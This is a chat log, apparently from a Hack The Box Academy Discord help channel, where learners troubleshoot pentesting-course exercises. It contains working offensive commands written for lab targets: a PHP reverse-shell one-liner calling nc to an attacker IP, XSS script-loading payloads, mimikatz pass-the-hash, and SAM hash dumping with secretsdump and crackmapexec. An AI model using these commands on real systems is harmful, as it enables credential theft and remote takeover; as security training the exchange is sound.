#modules
not sure where you got those files from as you didn't really include any info, but i would make sure you obtained them correctly. if you just randomly found them somewhere they may not be useful.
did you solve this
is that in a console where the user has elevated privs?
try to check the md5sum to see if the files are transferred correctly
how can I check it
in linux md5sum sam.save
Have you tried simply dumping sam remotely?
[★]$ md5sum sam.save
6808a99b9a7d854d099fa82530bd0377 sam.save
ig he doesn't have creds, just a shell on the machine
with a system shell he can simply add himself a user and add them to admin group
I have followed all the steps
I also checked that the files are transferred correctly
what user is your shell running as
but this command is not working
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
the question itself also provides creds
From what i remember the module gives rdp session that has admin rights, i did that a few days ago and had 0 problems
depends on the situation
try impacket-secretsdump ..........................................................
okay let me try
After move, the file is gone from the target machine, and you can't check the md5.
copy instead of moving
why ?
So he can check md5
if it didn't work try netexec try --sam but you need creds for that
the module gives him the creds
$ locate impacket-secretsdump.py
locate: warning: database ‘/var/cache/locate/locatedb’ is more than 8 days old (actual age is 355.4 days)
┌─[us-academy-3]─[10.10.14.211]─[htb-ac-1120979@htb-6e3z9bl4q8]─[~]
└──╼ [★]$
Are we sure he is in the correct directory where all 3 files are?
just impacket-secretsdump
okay
without .py, you don't need the absolute path
[★]$ python3 /usr/bin/impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
File "/usr/bin/impacket-secretsdump", line 3
name_script=$(basename $0)
^
SyntaxError: invalid syntax
don't use python, impacket-secretsdump is a binary itself
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
only this
[★]$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.12.0.dev1+20240418.131633.ea96b63a - Copyright 2023 Fortra
[-] read length must be non-negative or -1
[*] Cleaning up...
your files are corrupted
something is up with the files
ooh
use netexec or re-do it from scratch
okay i will re-do it
Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local .
https://academy.hackthebox.com/module/218/section/2389
what exactly shld i fix ??
This is from "Web Requests" "GET" section, is this exercise broken? (I put asterisks to not reveal the flag)
try removing the flag: portion and just put the flag in there
..... I'm amazed at how much of a dumbass I can be sometimes lmfaoooo, thank you
"NTLM RELAY ATTACKS", Skill Assessment: I am currently stuck on Question 3 and could use some nudge. I will share what I have tried so far.
right?
even though I am putting credentials in a login.php form ...it's capturing a GET request, not a POST request
Hi all. I'm working on "Attacking Web Applications with Ffuf" -> Skills assessment. Is there someone I could DM with to check my work?
login pages need not require a POST request to submit login data
yes
it will obviously depend on the web server
some do GET requests, others do POST
I don't know why I can't get this file to come through, but the other two do.
try \\10.10.15.149\share\system.save
┌─[us-academy-3]─[10.10.14.211]─[htb-ac-1120979@htb-iffg1lknpl]─[~]
└──╼ [★]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] read length must be non-negative or -1
[*] Cleaning up...
again same error
no idea, dump it remotely using netexec
how to do it pls explain
crackmapexec smb ip -u user -p password --sam
read length must be non-negative or -1 your files got messed up somewhere
are user pass same as given for rdp
yes
Anyone available to assist with the Command Injection Bypassing Blacklisted Commands module?
what to do after this?
nothing it should done the job
it just
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
what would its result?
read the section again, you are lost
first run initialises things, run it again
hello #academy-announcements
new spot to share small updates about new modules n stuff
can't wait to see what's been cooking

My issue was with syntax, figured it out.
anyone else's target systems not spawning?
still beta tho
no
I got it and found the answer
thanks for your help
hey is windows powershell harder than bash because it seems way harder than bash
maybe that's just because i have more experience with bash but idk
yeah i guess i meant intuitive
it seems simpler
Hello! I am trying to do the arithmetic instructions section of the assembly module but I get this error
any ideas... the assembler runs fine with other .s files
Take out the subdomain
...
I feel like there's something missing
Ah because both of those are wrong
It's not cto
Read the emails more carefully
You won't get there with whois queries.
Hi again, anyone completed recently the intro to assembly language module?!
I can't assemble the files I am supposed to... I follow the module instructions but it's not working
It happens
to be more precise the sender is CTO; but that's not their email
the infosec foundations path is kinda in a weird order
intro to bash scripting comes before web requests but web requests is listed as a prerequisite for intro to bash scripting
guess i'll do intro to networking next
Anyone working in the intro to assembly language?
Answering to myself: I think I solved this one.
give more info
oh come on don't be that guy
when I run the file provided I get this as response
I can't follow the module guidelines
which section
maybe check out pwnedlabs
I did that module, aside from the skills assessment, I still can't figure that out. But I struggled with that whole module! @next bronze was very helpful!
Yes... it is quite challenging...
And for some reason I have not figured out why I can't follow the module examples...
I had the same problem on a lot of that course, I could run the same stuff as the examples, but it would show different memory addresses.
Do you remember how you solved the arithmetic instructions module?!
I try to assemble the file provided but it does not work...
I can look in a bit, that is on my linux box, this is my work computer, I will take a look when I can (probably an hour or so).
Ok! thanks a lot.... I will keep trying different things
feel free to dm me as well, if you would like.
is your assembler script correct? try just assemble into elf and not feed it into gdb directly
I'm stuck at attacking ColdFusion. I managed to gain a shell, but the question asks for the user ColdFusion is running as, so I typed whoami and hostname, then submitted them and got wrong answer. Any hints?
I have tried without the assembler and I get the segmentation fault error
And when I use the assembler I get this error
the segmentation fault is because you need to exit the program properly (they explain that in the syscall section)
even so, you should get your answer if you've done it correctly
exit the program?? I started a new pawned machine several times and even at the first attempt I get a segmentation fault
this is the file
no, you should call the exit syscall when you finish (just read the syscall section)
Ohhh I think I get it
even if your program crashes, you should get your answer (in this case)
I am reading through the sections again
... you can't just do syscall without setting up the registers first
but you don't need to do that for this question
.
I am trying to follow what the question says...
I'm talking about the syscall at the end, that's not needed and not how you use it
why do you feed it to gdb in the first place?
I don't know... I wanted to see it before trying to execute it...
I will try to execute... I get segmentation fault
you don't need to worry about the segfault now, if your code is right you'll get your answer
what's the difference between -contains, -equal, and -match?
i mean...it's kinda explained right there
ok so -contains doesn't have to be case sensitive
but what about -equal and -match i don't really get the difference
-match is regex
ummmmmm
-equal is not
so there is no need to execute or to debug??
ok thanks
I can't do either since I get the segmentation fault error
it's simple, write the code, assemble it, execute it, get the answer
I'm doing the Attacking Common Applications section Application Discovery & Enumeration, I can't seem to find the header from opening the aquatone_report.html
I'm prolly blind af but I can't find it
Does anyone know which module covers the "TRACK" verb for HTTP in the pentester's path? The web attacks module claims there are 9 verbs, with a link (https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods) to here showing them, and none of them are "TRACK".
there's a lot of headers in the page source lol
I can't remember where exactly you can find it
I assemble and execute but I get nothing... the file already has the xor rbx, 15
then you're doing something wrong
many things wrong haha that's for sure 😦 😦
this is the code...
T-T
don't you need to run it through gdb, how are you gonna see rbx
I just check the question
I was wrong
he needs to run it in gdb
yeah just run through it and look at $rbx
What is the hex value of 'rbx' at the end?
and see the value of rbx at the end of execution
since that is the question... I assume I must do something else
@arctic sentinel sorry for the misleading info
no worries! everyones help is really appreciated
but I cant execute... I get nothing as answer
don't set breakpoints on gdb just run it check the registers at the end
It's something obvious. 🙂
I get the segmentation fault if I try to run it
I placed the syscall at the end but does not solve it
and the syscall section is like 5 sections ahead...
I am also trying to follow chatgpt instructions 😦
as I've said, you don't need to use syscall. run it through gdb step by step
just run it , and check the rbx
5 sections ahead...
just do what's explicitly in that section
do you see something like this ?
are you using the GEF ?
also did you break at the start?
I didn't and I got the answer
hm it should show the registers even if segfault
now I get something!
just read the rbx
gg
you don't actually need to run anything btw, just look at the code, xor 15 with 15 gets you what?
0
Hi everyone, just had a question. I'm on the Information Security Foundations "Setting Up" module, section "Installing Additional Tools". Just wondering if this is required on the new Parrot OS
if the required tools aren't installed, you should install them
this is how I'm typing in the command: sudo apt install netcat ncat nmap wireshark tcpdump ...SNIP... git vim tmux -y
do not include ...SNIP... in the command. include all tools that you need
don't just copy and paste the commands
you can create a list and have apt read from a list btw
aren't those included by default in parrot?
that too but that's kind of a later issue
that SNIP is just to not clog the area up with text
they should be
a lot of the tools though are installed by default in parrot
ahhh okay, that's what I was wondering
i would be horrified if parrot doesn't include nmap
they are, i think the example was shown on an older version of parrot
some of the more niche tools require some level of install via source
they teach you how to get tools by yourself
likely 4.x or 5.x
it's not about parrot
that's what I had figured also
more than likely 4.x
apt get urmom
¯\_(ツ)_/¯
apt purge @next bronzemom's
not enough space on disk to install
u forgot sudo
don't mind him just a skid
i was just about to make this joke

lol thanks everyone
hello guys, in the double pivoting section of the pivoting module, did anyone face problems when trying to connect Proxifier to 127.0.0.1:1080?
I followed the module and had no problems
what method did you use for the ptunnel section instead?
just one of the other shown methods
¯\_(ツ)_/¯
i tried a handful that just aren't working but ill try a few more
i mean the other thing for ptunnel is compiling it statically
but i just didn't care enough to do it ¯\_(ツ)_/¯
me neither also idk how to do that
i remember having this exact issue with chisel but i managed to get it to work a different way
when I set up a proxy server on 1080, shouldn't mstsc's traffic be routed through it by default?
depends on how you set it up. 1080 is a common default port for SOCKS proxies
is there anyone who can help me with a module, i requested it through the Academy, but i used it before but eventually didn't get to speak to anyone
just pose your question along with the module/section
Thank you, I'm in the module Command Injections, within section Identifying Filters. I identified the method, but it is not accepting my answer. I tried all injections, only one injection identifies but I cannot seem to give the right answer
You can DM me what you're trying if you want and I'll take a look
thanks
extremely specific question, in powershell when you're using a command like where, what's the difference between, for example, where Name -like '*.cfg' and where {($_.Name -like "*.cfg")} because they both give the same output but this htb module just brought up the part with the curly brackets and the dollar sign and whatnot without explaining it
$_ is for each
oh if you're doing multiple filters?
something like that, yeah
thanks @cloud urchin great help
I don't see an example of mimikatz extracting hashes in the section the following question was asked in:
Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?
Is there a way to dump the NTLM hashes? Am I missing something?
Coincidence @valid viper working on the same module as me at about the same time. Pass-the-Hash module and the last question to get the flag off DC01 using a reverse shell. Used mimikatz w/ julio's hash to get a powershell session. Have a listener going. Have all the right info in the reverse shell command and am not getting a shell on the listener. Happy to DM w/ someone if they can help...would greatly appreciate it!
Anyone able to help me with the injection attacks module, skills assessment part?
Are you operating your Linux box in a VM or on bare metal?
bare metal but that's not my particular issue
Is your firewall enabled?
well that wouldn't be an issue on my box but i guess i can check the firewall on my RDP session
Well, if you have ufw or iptables up and running...
That can interfere with catching a shell.
the listener is on a windows machine that i'm RDP'd into so the connection is local between DC01 and MS01 which is the machine i'm logged into and have run the mimikatz commands. 443 is also allowed in which is one of the ports I've tried with the shell
You're using port 443...?
i've tried several ports for fun, I don't believe the ports are the issue
Port 443 is HTTPS.
That's an interesting way to pop shell...
From the lesson I mean.
yeah i used 8001 as well
Your scenario sounds really weird. Why are you trying to get a reverse shell from DC01 if you already have command execution on DC01?
i'm on MS01, trying to get a reverse shell from DC01
connected to MS01 not DC01
ok well if you want a reverse shell from dc01, you'll need to be able to execute commands on dc01
can you do that?
i'm attempting to use invoke-the-hash for the reverse shell, so really i should be using the hash to get the connection from windows-to-windows or I guess I can look into cracking the hash and then doing an RDP session from MS01 to DC01. Not really part of the module but doesn't matter as long as I get there I guess lol
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
that's it
what module and section
So you're catching the shell remotely via nc.exe (netcat), do you have that running?
Password Attacks - Pass the Hash
^
And you have nc.exe running?
yes
What Powershell command are you using to try to pop the shell?
Are you using Julio's username + hash?
Not really sure that we can post full commands in here as it could be spoilers? Anyway, I'm invoking WMIEXEC -target <target IP> -domain inlanefreight.htb -username julio -hash <hash> -command "powershell -e <insert shell from revshells>"
well that's wrong
There's the problem.
it's Invoke-WMIExec
-Target DC01
that's not what you showed us though
Try inlanefreight.local
you can DM me a screenshot of your command if you want
C:\tools\mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:NTLM|HASH /domain:inlanefreight.local /run:cmd.exe"
inlanefreight.local worked for mois
this one is inlanefreight.htb
Oh interesting.
so the particular issue with this was after running import-module .\invoke-thehash.psd1....my next command began with " .\Invoke-WMIExec " when it appears it should just have been "Invoke-WMIExec" thanks @cloud urchin for clearing that up...should've tried that before
Why do I have to put a + in the command for php shell for ls -la in this example?
I tried it without the + and it returned blank
The module doesn't explain this
I'm working on the Shells and payloads module and i'm on the infiltrating windows section. The system is vulnerable to Eternalblue and my auxiliary shell even confirmed it, but all of the eternalblue scripts fail to create a session. What should I do?
It's URL encoded, + is a space; sometimes it can be %20 as well
So the cmd is ls -la
There are multiple different versions of EternalBlue. Have you tried them all?
Yes, I searched them on Metasploit like the module said, and used all the options available
all of the options or all of the modules?
Well now that I think about it, I didn't try msfvenom yet
I don't remember which section it was but had trouble with EternalBlue as well. But then randomly it worked
Like you just kept trying the exploit and it just worked?
Idk, I went out of msfconsole and back in, set the correct IPs again and it worked
I tried multiple eternalblues there
And then it randomly went through
But i cant find my notes about it
Okay bet
yeah, you have to use the correct one
you said you tried them all though
in which case it's probably your payload
You guys set the LHOST as your machine IP right?
LHOST is usually tun0; unless in cases where you're pivoting then it's whatever interface is connecting to the target
Okay, I had it set to my main IP, I switched it to tun0 and am retrying..
maybe that was the issue
Fk my obsidian notes got mixed up.... Holy f
Shells n payloads live engagement write is now john the ripper i guess💀

all my notes for the skill assessments are using the Canvas Feature
finally it worked
Yea great imma have a great sleep now, knowing some of my notes are gone
thank you guys
😭
just re-read it
and girls^
Why am I getting blank values on the SQLMap Skills Assessment
tried
sqlmap -r req.txt --banner --current-user --current-db --is-dba --no-cast
with and without --no-cast
I just need to find out what database I'm in, but SQLMap is not working.
It's not in the logs either, but the logs do have some information hinting that it might be a time-based technique needed, unfortunately I'm not to that point yet, since I don't have the database
The "retrieved: " section is blank, there should be some kind of output there
Anyone have a similar issue?
Check DMs 🙂
for Session Hijacking inside the Cross-Site Scripting (XSS) module.
I'm having a hard time finding the vulnerable parameter. I've put each of these payloads in each parameter (Except email) and I don't get a call back to my http server.
<script src=http://10.10.14.117/test</script>
‘><script src=http://10.10.14.117/test></script>
“><script src=http://10.10.14.117/test></script>
What else can I try? Thanks for the assist
you need to have some kind of javascript payload
Finally got past the VHD mounting, was always the better option to mount it in another Win VM and unlock it 👍 thanks for the help anyway
¯\_(ツ)_/¯
after completing a module, if not satisfied or need more experience in that module, what should I do?
don't have HTB main sub yet
HTB won't have any box specific to any module, right? It will be a mix of many modules, that's why I'm stuck there
If there's a specific subject / module you want to get more experience on, there are many boxes on HTB that could cross over with what you're looking to learn. Many retired machines, covering many subjects, but many of the retired machines would require a subscription. Check out https://ippsec.rocks/?# - he has a lot of good video walkthroughs on retired machines, showing process, tooling and mindset
Search utility for IppSec's YouTube videos
Watching his videos of course does not require a subscription, but if you wanted to play the machines, it would
hey @goblin is your name james coz i saw htb channel in telegram with your username
Many modules also have more advanced versions of them, taking it to the next level.
Yes it is, and you tagged the wrong person 😅
hey guys, can I get a help on skills assessment: website (bruteforcing) first question. I’ve already captured the flag on the 2nd question, but I have no idea where to find or capture the flag on the 1st question
that I can do, thx for some advice

try with --output-file ./oracle_db.odat.save
oh rip.. why tf is there just a time and not a date lmao
sorry.. just ran into the same error myself 🤣 this doesn't even work for some reason, i had to run as sudo
I can’t save bash script with nano! Can someone help? I’m on intro to bash scripting
what's the error? i got lost
😛
Do you lack permissions to save to the directory you're in? CTRL+X, Y, enter
Include the issue you're facing 😉
anyone here finished the password attacks module?
no one
@wary tendon I don't do random dms
Just ask your question here or utilize discord search to see if your q has been answered
Now that you've done it in Windows, give it another honest go in Linux
I'll pass for now
hey, by any chance could you help me on a module? I'm stuck and am like not sure I'm understanding this example
[10:48 PM]
i could share my screen with you
[10:49 PM]
it's in the Tomcat enumeration and discovery chapter of Attacking Common Applications
but thanks
Give it some time
I'd rather progress the material since that's not totally important right now
I'm not sure what you mean by this. I've also tried <img src='x' onerror='var d=document; var s=d.createElement("script"); s.src="http://10.10.x.x/xss.js"; d.body.appendChild(s);'>
I even do : sudo nano flag.sh
It works on iPad just not my Linux laptop it just doesn’t work in any instance on HTB. It prints X on bash script and then I can’t exit either
Yeah, what’s up?
did anyone else have trouble with the footprinting dns module and if so how did you come to understand it
Any specific issue @gilded ice? Feel free to DM
anyone online to help with the HTTP Attacks -> HTTP Response Splitting section question?

What exactly is not working?
I have the payload working I believe. Tested it in my own browser with document.domain instead of document.cookie as a PoC. Just having trouble delivering it, it seems
The encoding seems right since it looks good in the log file, but not getting any hits from the admin user
have you read the hint?
yes, tried localhost instead of the public IP if that's what you're referring to
|| Certain special characters need to be URL encoded multiple times. There is a firewall in place that prevents the admin user from accessing any external endpoints!||
Send me your request as a DM and I'll try to push you onto the right path. Without seeing exactly what you are doing, this is very difficult
you can use the one they used and just change some stuff like the IP and port, no need to go off script
I did try the example in the module, but I didn't get a call back.
ima go to sleep rn, I'll help when I'm awake. Just send what u tried and I'll help in the morning
Thanks. I'll dm you if I'm still having problems. Goodnight! 🙂
hey guys
when I connect with sudo openvpn from my VM and then ssh to the target IP, it gets disconnected after 2-3 minutes
why am I facing this error?
You likely are connected from multiple places, e.g. on a Pwnbox and your own local VM. If you're not using the Pwnbox, run killall openvpn, or just reboot the machine you are connecting from.
Essentially multiple connections will "fight" against each other for the connection, as VPN connections to HTB labs are not multi-tenant, e.g. only one person can utilise the VPN connection to the labs at one time.
ooh got it
MODULE: Whitebox Attacks
SECTION: Client-Side Prototype Pollution
I'm really struggling with manifesting the attack chain in the exercise. After examining the /admin.php page contents, I thought that I was meant to forcefully have the victim promote my account, but my payload(s) haven't worked. Am I in the right ballpark?
Can I dm?
Hello man, can you help me please with a WordPress attack: https://academy.hackthebox.com/module/113/section/1208 Where is my error?
error message :
and I listen with nc -lvnp 5555
You are using both? nc -lvnp and Metasploit? And both are on 5555? Yeah, doesn't work, address in use
I have, what do you need?? 🙂
Now I have this do you have an idea ??
Double check if you have the correct IPs. I haven't done the module but looks like something is wrongly set
Anyone working on the Intro to Assembly Language module?!
isn't blog.inlanefreight.local specified as vHosts at the end to be used for answering the questions?
Hey. Has someone passed "PIVOTING, TUNNELING, AND PORT FORWARDING"?
If you had to guess, do you think anyone has completed the module?
Currently working on the skills assessment for Intro to Digital Forensics and I completed all questions but the third one asking about the registry key used for persistence. I am pretty sure I found it but not sure why it's not taking. Is there a specific format it wants?
Full format version (path + key value)
For example: HKEY_CURRENT_USER instead of HKCU
yes, and for sure I'm not the only one here. If you want you can let us know what problem, in case, you're having
working on the file inclusion skills assessment, I'm super close I can feel it, probably just need to use traversal.
I'm 60% there, this one really uses all the module!
Hello guys,
Which command should I use to see only the scan result to see these details in my search?
proxychains -q will squelch errors
I can't see what level my scan is at this time
then be patient, you have no verbosity set on the nmap command so you're not going to see anything until it's done
oky thanks
you can add -v or -vv to the nmap command and see results right away
or not results, but what it's doing rather
i believe you can also do --stats-every=5s as an nmap argument too
oh oky thx
i have question
pivot module - dynamic port forward socks tunneling..
first question - You have successfully captured credentials to an external facing Web Server. Connect to the target and list the network interfaces. How many network interfaces does the target web server have? (Including the loopback interface)
I don't understand this question
How can I open the web page on the pivoted machine from my own browser?
Hey everyone, question. For the Footprinting Module, SMTP section; where is this allegedly provided “footprinting-wordlist”?
resources ?
…I've gone through 6 other entire modules and never knew this was a place/thing 🤣 ty!
I can't MSG this here but why can't I MSG in general channel
Read #welcome - you need to verify your HTB account
How are you tunneling? Chisel?
proxychains
proxychains isn't a tunnel, but if you're using that just type 'proxychains' before your command. like 'proxychains firefox'
yeah I'm trying but it's not working
Lately? It's been a pain as far back as I can remember. Some were better than others but still a pain.
You're going to have to include more information, simply stating "it's not working" doesn't help us help you. That's like me saying "just make it work then"
true sorry
my target machine(ubuntu) -> 10.129.247.120
my pivot machine (windows) -> 172.16.5.19
pivot machine ports (windows)
if proxychains worked for nmap, it should work with any other program
when you type 'proxychains -q firefox' does firefox open?
should work then. are you sure you have the right port? did you try both http and https?
morning everyone, i'm doing the first skill assessment on Attacking Common Applications. i'm having issues running the PoC
can i dm someone for help
no rev shell not sure why

Try to help, no reply, sad
Goblin got banned
I read your reply and it was interesting
Thanks
Removed them myself

so correct exploit but I need to modify the script, or I need to use a different exploit?
that CVE is correct, the script must be modified. You have to do a bit of enumeration since you didn't find the correct endpoint to exploit. Then you can either modify the script or use something else to automate the task.
ok thanks
isn't the endpoint to exploit cmd.bat?
for you to find out
Anyone can give me a nudge on the skills assessment for the module "NTLM RELAY ATTACKS"?
I might need some help on** Section: Whitelist Filters, Module: File Upload Attacks. Question: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt" **I have found extensions that allow me to successfully upload the php webshell to system. However, when I send a GET request to /profile_images/{file_name}?cmd=id, it will return 404.
sounds like you're not calling to the right location/filename to me
can someone help me with this one
module SQLMAP ESSENTIALS (Attack Tuning)
hint (Try to count the number of columns in the page output, and specify them for sqlmap.)
mmm because of the way the file extension was used, let's say the filename that was successfully "intruded" contains \x00 (null byte), when I call it by /profile_images/{file_name}, it's not the same
because the browser kinda removes the \x00 when it saves the file at the /profile_images endpoint if you get what I mean
that changes nothing about my answer. when you call to it the server gives a 404 error. 404 means the file cannot be found. which means when you're curling you are either pointing to the wrong file path or file name.
hmmm ok ill rethink about that
i was able to complete the entire module without null bytes
what about it are u stuck
what is the command, how to use the UNION query-based technique
(Try to count the number of columns in the page output, and specify them for sqlmap )
how to do this exactly
if you read the last part it would tell you the answer on how to perform it,
```
UNION SQLi Tuning
In some cases, UNION SQLi payloads require extra user-provided information to work. If we can manually find the exact number of columns of the vulnerable SQL query, we can provide this number to SQLMap with the option --union-cols (e.g. --union-cols=17).
```
great, how can I know the number of columns
for the nibbles foothold what does the port need to be for netcat?
Getting Started - Initial Foothold
You should take the SQLI Fundamentals course, it will teach you everything about this.
Catching the shell? You need same as in the command then
i did but my brain is on fire
i recommend taking the sqli fundamentals itll make your life easier but just count the columns you see on the web page
i did
but i'm kinda lost here, how to know the number of columns without being in the database and only from sqlmap
uh bro you don't need to be in the database to know the columns, it's right in front of you on the webpage
did you take notes about how UNION sqli works
aha so its a 5 ?
sqlmap -u "http://----" --level=5 --risk=3 --dump --batch -T flag5 --union-cols=5 ?
try and see, i don't exactly remember the commands i used
it worked like this
sqlmap -u "http://94.237.63.8627/case7.php?id=1" --level=5 --risk=3 --dump --batch
without any UNION stuff
i believe its bc of the level and risk lol
i tried it rn and i did it without the level and risk and did the union and it worked
can u show me the command
you practically have it lol
Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
Need help on this task, Splunk module
the --union-cols=5 ?
just remove the level and risk and add the union and see
in IRL hunting this LEVEL and RISK are crazy right
i mean you'll be noisy af lol
aha
sometimes its good to be more stealthy and cause less traffic
thanks mate
fs
So I am on Kernel Exploits in the Windows Escalation Privilege Module and I keep getting this: No such file or directory: 'SYSTEM-2021-08-09' when I try to run impacket-secretsdump after I have run HiveNightmare.exe on the host machine. I'm literally staring at it right now. Here is my command: sudo impacket-secretsdump -sam SAM-2021-08-09 -security SECURITY-2021-08-09 -system SYSTEM-2021-08-09 local. (Have tried with the target IP at the end as well, it just tells me Access Denied).
well, if the file is not found you're not putting the right file name in. try starting the file name and pressing tab to auto-complete it
?
sorry what
You mean this? nc -lvnp port?
so it's 9443?
It's whatever port you make it, as long as it's open for outbound traffic on the target
Depends on your reverse shell. If you just pasted the one in the guide then yes.
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
but the ip for the website isn't that
well for me anyways
Well ofc it isn't. But it was the IP for the one who wrote that guide. So for you it's gonna be a different IP
And if you want you can change the port as well to a random one that's not being used, example 9001. You will need to change the nc -lvnp 9001 as well then
I set the ip to domain in the hosts file, am on windows. but I still can't access the domain.
Hello, hello, I got two questions.
- Why when I do a PtH attack, mimikatz doesn't log me in as the attacked user, rather gives me a "session in the context of the user"? This idea of a context doesn't sit well in my brain.
- What is the difference between a PtT and overpass the hash attack? I mean more in a sense of when would I choose one over the other - they seem very similar for me
Did you do it as
ip domain
?
yess
so annoying it doesn't work. probably would work on linux when it is in the /etc/hosts
but should work on windows as well 🤔
PtH uses a user's NTLM hash, whereas PtT uses the ticket generated from the krbtgt service (basic explanation)
Well windows is in like C:/windows/system32/drivers/etc/hosts
yes I did it there
Second: your windows machine would need to be connected to the vpn
Can you ping the ip?
yes
Is this for an academy module or a box
Okay, so they both give me the same result of lateral movement (if successful) but depending on what I find in the environment I can go with the first or the latter
it's the starting thing
Starting-point? That's part of the main labs site
See above and ask in #starting-point
yes that
no access
It takes like 5 seconds to do
Lol
Also fwiw http://domain in the browser
I don't recommend using windows though for htb
Stick to linux/a linux vm
I was using wsl2
hehe
Wsl sucks
wtf
is it common people use a linux vm for htb
Also you gotta go through a bunch of extra setup for wsl
where the food
Yes
Kali and Parrot are the most common
which u recommend
I prefer Parrot because less bloated software on install, but Kali is alright
try them both and see what you prefer ¯_(ツ)_/¯
you're right, thanks for the info. it comes preinstalled with tools I need. like johntheripper, I have to use that in this lab
Yes a lot of tools are already preinstalled
in the file upload skill assessment, am I going the right way by using svg
Hello everyone! I am doing the unconditional branching in the assembly language module!
I am stuck in here... Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end?... I modified the file provided and ran the program till the end and I get 0x100000000 as rbx but it's not the right answer....
I also tried the same value since I think the loop never happens...
does anybody else's target box terminate prematurely ?
Was it up for a longer time without refreshing the window?
last time it did it was up for like 20 mins
Hey guys I'm new to entering coding world so i want someone to help me
Ah then no
the channel you seek is #programming you should visit #welcome and register your account
Ok
Anyone has done the unconditional branching module??
Guys I know the log for this question, however it is not accepting it
Modify and employ the Splunk search provided at the "Detecting Kerberoasting - SPN Querying" part of this section on all ingested data (All time). Enter the name of the user who initiated the process that executed an LDAP query containing the "(&(samAccountType=805306368)(servicePrincipalName=)*" string at 2023-07-26 16:42:44 as your answer. Answer format: CORP_
This is not CORP\+user ?
Module Footprinting. Section IMAP/POP. Question: What is the admin email address? Is it asking the admin email address for the POP or IMAP service?
Pop/imap is the same
It's the overall mailservice and it will be the same
Once you log in and retrieve the mail, you should see it
thx
Note the 1 fetch <id> all command only collects info about the message, not the contents, so you may see a bunch of NIL
A link to a couple comprehensive articles re: imap
anyone know how to fix "there are no available instances, please try later" T-T
Change vpn region
thanks i was reading those earlier 🙂
what is the deal with having to precede imap commands with what seems like a random character or string
It's like an identifier, basically
like a login
But tbh that's just the way it is
but it identifies nothing? it's just what the server expects
protocol idiosyncracies
might be idiosyncrasies
It can be set up to where depending on the source (i.e. an email client) it identifies how it was accessed
Also keep in mind, these protocols are ancient
yep thanks
\noselect flags mean the folder cannot be selected i assume
indicating it's not a "real" folder?
Perhaps
As you likely saw when you listed, there's a drill down to a specific one, also it's case sensitive
So "dev" isn't the same as "DEV"
It's one of the few things within imap that is case sensitive
good hint
I also suggest doing it with pop3s just to get practice with it :)
I like imap(s) purely because it's organized
mmm
they're fun protocols
smtp also
telnet port 25... send some unsolicited mail 🙂
Smtp just facilitates communication
Hi, I am in attacking common applications, I am looking at the modified manifest file which gives the correct path to the starter class but I am still getting this error. I even tried double checking it by decompiling the new jar file
Did you still need to reach me?
hmmmm i'm reading the article on pop and i think it is saying you can only access the inbox?
Nope
You can access any available mailbox
ok, but there doesn't seem to be a list or dir command
1 select <mailbox>
1 list
Oh
but i'm trying to retrieve the mail on pop3 service
Pop3 doesn't have an organization structure
list shows the mail and ids
Then retr <id>
ok, the pop service reports 0 messages, so not sure it sees all folders
Sec
+OK Logged in. list +OK 0 messages:
the question does say specifically to read it from the imap service so getting there is a difference
It could be that it's only available on imap
I might have been thinking of another module/skill assessment
Usually it should be available to read on both
pop3 could be pointing to a different mail server entirely, or it may not have downloaded from the server yet
they are different protocols and both manage email differently
if you see both running on a server you should check both
In this case I think it's a case of pointing somewhere different, purposefully
The question explicitly states reading email with IMAP
it could also mean that the pop3 client simply hasn't downloaded the email yet
@mild python please avoid posting content that could be considered spoilers for others. Take questions like that to DM's for those that are willing to give you advice.
I have a problem connecting to the vpn I tried all the possible commands
I need a help @ocean night
Please reach out to our support department at https://help.hackthebox.com, or browse this article to try and come to a solution yourself https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting
VPN issues? Slow connections? Can't reach machines? Start here!
Then you'll just need to wait for them to respond I'm afraid
I'm not here as a support agent, I'm sorry
Warning : compression for receiving.......
That's a warning not an error
But it doesn't work at all
At the tail end of that do you see "initialization sequence completed"?
Are you running it with sudo?
Yes
I'm not support, and did not ask you to dm me
Just to send u the pic if u have any help
Your pic you dmed shows me it connected
Why is there no ping??
¯_(ツ)_/¯
spin up the target box and ping it
yeah think that makes sense
thanks guys
If you do ip a do you only have one tun interface?
Nothing returned
Also different vpns for different portions of htb
Starting-point is different from labs is different from academy
No 20
for the academy vpn i always download the config file every time i spin up a target
20?
Then that's your problem
It doesn't know how to route traffic to you bc you have 20 ovpn processes running
20 tun interfaces?
sudo killall openvpn
Then run the vpn connection again
If you see "initialization sequence completed" then it's connected
Still 20 tun
I did
This is for information gathering web edition module. The section is Active Infrastructure Identification.
I am trying to use WhatWeb to figure out the CMS used on app.inlanefreight.local. It's a one-word answer. I thought it was Apache but it's not. I know the OS used for inlanefreight.local and I know the Apache version.
How do I find the content management system?
So after killing all openvpn processes it still isn't working?
Restart your vm and then try again
I think that I should ping the tun IP address, not the one on htb
?
The tun ip is the ip assigned to you by the vpn
Apache is the web server running, not the CMS
right I know how do I find the CMS?
When I ping the target ip there is no result when I pinged the tun it worked
unfortunately, i don't have the notes for the module
